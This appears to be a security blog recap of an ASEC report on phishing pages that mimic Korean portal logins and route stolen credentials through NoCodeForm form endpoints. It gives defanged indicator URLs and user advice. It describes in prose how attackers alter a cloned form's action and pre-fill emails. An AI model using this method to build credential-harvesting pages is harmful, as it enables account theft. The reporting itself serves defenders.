Researchers discovered phishing attacks mimicking Korean portal login pages, where fraudulent login screens closely resembled legitimate sites, making them difficult to distinguish at first glance by targeting various Korean portals, logistics brands, and webmail services.
It included comparisons: the left side displaying the phishing page (e.g., a fake Naver login) and the right side showcasing the authentic page and another example revealed the phishing HTML file (named “doc003.shtml”) designed to mimic the Nate login page.
Threat actors are creating highly deceptive phishing pages by leveraging the legitimate source code of real websites and altering the code to steal user credentials by replacing the login form’s action and address with malicious ones.
The technique conceals the phishing attempt, as the page appears genuine except for the data transmission mechanism and to further trick users, they may pre-fill the login form with the recipient’s email address, increasing the likelihood that unsuspecting victims will enter their passwords.
Hackers exploited NoCodeForm, a service designed to handle form submissions, to steal user credentials, which allow sending form data via email/Slack in HTML format.
By creating an account and obtaining a unique form- ID, attackers could capture user input from external forms, which essentially turned external forms into data collection tools for the attacker, enabling them to steal sensitive information submitted by unsuspecting users.
An attacker altered a legitimate website’s form to steal user credentials by modifying the form’s “onsubmit” event handler to utilize the “action” property instead. This action property points to a NoCodeForm with a specific form ID, acting as the destination for the stolen credentials.
Tests confirmed that user-entered credentials are captured either through NoCodeForm’s default collection or a method designated by the attacker, such as email or Slack.
ASEC warns users against logging in via attachments in emails from unknown senders, as phishing attacks are frequently disguised as legitimate websites and the high quality of phishing page replicas can make it difficult to distinguish real from fake.
To ensure security, users should avoid logging in altogether unless they have accessed the website through a trusted channel and if a login attempt was made on a phishing page, users should immediately change all relevant passwords.
The system detected two phishing emails (Phishing/HTML.FakeLogin.SC199025 and Phishing/HTML.FakeLogin.SC199026) on April 12th, 2024, which likely contained malicious links that directed users to fake login pages designed to steal their credentials.
The Indicators of Compromise (IoCs) associated with these emails are two URLs: hxxps://nocodeform[.]io/f/6612aaccf9a3a01ba8f6d979 and hxxps://nocodeform[.]io/f/6605717e7bf0d35064f45348 and by analyzing these IoCs, security professionals can identify and block future phishing attempts that use the same infrastructure.
Never forget to check out our YouTube channel, ETHICAL EMPIRE, and keep reading our exciting blogs. Until next time, stay curious, stay secure, and keep exploring the fascinating world of cyber security. See you soon, bye!
